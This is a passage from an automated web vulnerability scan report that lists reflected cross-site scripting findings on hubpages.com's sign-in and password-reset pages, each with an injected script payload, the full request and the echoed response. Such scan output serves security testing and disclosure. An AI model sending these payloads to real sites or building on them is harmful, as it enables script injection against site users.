...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1', 'HubPages New User Signup'); return false;">
...[SNIP]...

2.33. https://hubpages.com/signin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e65d"><script>alert(1)</script>fa4c40e1602db8724 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Page not found'); return false;">
...[SNIP]...

2.34. https://hubpages.com/signin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb436"><script>alert(1)</script>cb65b8029ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:12 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

2.35. https://hubpages.com/signin/ [explain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61c0"><script>alert(1)</script>a1ea5dbbb55 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:50 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.b61c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea1ea5dbbb55; path=/; domain=.hubpages.com
Content-Length: 7959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.36. https://hubpages.com/signin/ [explain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23034"><script>alert(1)</script>656acdcaa3ebf7318 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:26 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.23034%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E656acdcaa3ebf7318; path=/; domain=.hubpages.com
Content-Length: 8011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.37. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d52d"><script>alert(1)</script>3ecb0670d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.38. https://hubpages.com/signin/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567de"><script>alert(1)</script>49cf52049d9a5294c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.39. https://hubpages.com/signin/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bba"><script>alert(1)</script>4d65f9ca019 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.40. https://hubpages.com/signin/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9a0"><script>alert(1)</script>dcbf5fa54aab84836 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsfd9a0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcbf5fa54aab84836; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.41. https://hubpages.com/signin/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c59"><script>alert(1)</script>1de617bf248 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:37 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsd5c59%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1de617bf248; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.42. https://hubpages.com/signin/reset/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ae0"><script>alert(1)</script>bfb058226eeddffe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email=', 'Page not found'); return false;">
...[SNIP]...

2.43. https://hubpages.com/signin/reset/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9430"><script>alert(1)</script>d04be060a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinc9430"><script>alert(1)</script>d04be060a2d/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinc9430"><script>alert(1)</script>d04be060a2d/reset/', 'Page not found'); return false;">
...[SNIP]...

2.44. https://hubpages.com/signin/reset/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b00"><script>alert(1)</script>db9cbd8e43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset61b00"><script>alert(1)</script>db9cbd8e43/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/', 'Page not found'); return false;">
...[SNIP]...

2.45. https://hubpages.com/signin/reset/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bce"><script>alert(1)</script>e3e68d52e9c6e238a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:29 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

